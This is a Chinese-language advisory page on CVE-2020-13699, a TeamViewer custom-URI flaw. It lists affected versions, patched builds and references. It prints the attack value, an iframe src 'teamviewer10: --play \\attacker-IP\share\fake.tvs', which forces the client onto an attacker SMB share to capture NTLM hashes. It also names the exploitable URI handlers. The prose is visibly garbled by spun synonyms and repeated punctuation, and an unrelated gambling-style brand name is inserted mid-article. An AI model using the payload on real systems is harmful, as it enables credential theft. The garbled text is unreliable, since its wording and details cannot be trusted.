首页 > 安全钻研 > 安全传递 > 安全公告

CVE-2020-13699 | TeamViewer安全缝隙公告

颁布功夫 2020-08-09

0x00 缝隙概述

CVE ID	CVE-2020-13699	时间	2020-08-09
类型		等级	高危
远程利用	是	影响领域	TeamViewer 8,9, 10,11,12,13,14,15版本

0x01 缝隙详情

近日，，，，，，，，TeamViewer颁布安全布告，，，，，，，，建复了一个缝隙（CVE-2020-13699）。。。。。该缝隙源于法式无法正确引用其自界说URI处置法式，，，，，，，，导致攻击者可起动TeamViewer并执行肆意代码或获得密码哈希。。。。。

要利用该缝隙，，，，，，，，用户必要浏览到一个恶意页面，，，，，，，，该恶意页面会在其Web浏览器中加载iframe。。。。。攻击者会将iframe的src 属性设置为

'teamviewer10：--play \\ attacker-IP \ share \ fake.tvs'

8827太阳集团(Macau)股份有限公司-Official website

此号令暗示本地装置的TeamViewer利用法式通过服务器新闻块（SMB）和谈衔接到攻击者的服务器。。。。。攻击者使用精心造作的URL将恶意iframe嵌入网站中，，，，，，，，该URL 会启动TeamViewer Windows桌面客户端并迫使其打开远程SMB共享。。。。。

由因而受害者的推算机提议与攻击者的SMB共享衔接，，，，，，，，因而攻击者不必要知路用户的密码，，，，，，，，可自动通过身份验证并获得接见权限。。。。。

钻研人员暗示：“Windows在打开SMB共享时将执行NTLM身份验证，，，，，，，，并且能够转发该要求以执行代码。。。。。」剽会影响URI处置法式teamviewer10、teamviewer8、teamviewerapi、tvchat1、tvcontrol1、tvfiletransfer1、tvjoinv8、tvpresent1、tvsendfile1、tvsqcustomer1、tvsqsupport1、tvvideocall1和tvvpn1。。。。。

0x02 措置建议

目前厂商已颁布补丁�。。。。�，，，，，，Windows的TeamViewer用户应试虑升级到新的法式版本，，，，，，，，其中蕴含：8.0.258861、9.0.28860、10.0.258873、11.0.258870、12.0.258869、13.2.36220、14.2.56676、14.7.48350、15.8.3。。。。。下载链接：

https://www.teamviewer.cn/cn/download/windows/

0x03 有关新闻

https://www.bleepingcomputer.com/news/security/teamviewer-fixes-bug-that-lets-attackers-access-your-pc/

0x04 参考链接

https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448

0x05 功夫线

2020-08-09 VSRC颁布缝隙公告

8827太阳集团(Macau)股份有限公司-Official website

7*24幼时服务热线

400-624-3900

+86(10)56631988(港澳专线)

官方微信

官方微博

网御星云合多数据书生电子

司法申明

8827太阳集团

网络安全防护

网络安全检测

利用安全

数据安全

安全治理

云安全

工控安全

移动及终端安全

密码利用安全

大模型利用安全

专业安全服务

安全运营中心

知白学院

威胁谍报中心

安全传递

钻研汇报

安全团队

渠路系统

售后服务

升级布告

软件升级

公司概况

新闻动态

技术专题

人才招聘

投资者关系

资源中心

联系8827太阳集团

安全钻研

CVE-2020-13699 | TeamViewer安全缝隙公告

关于8827太阳集团

解决规划

安全钻研

联系8827太阳集团

7*24幼时服务热线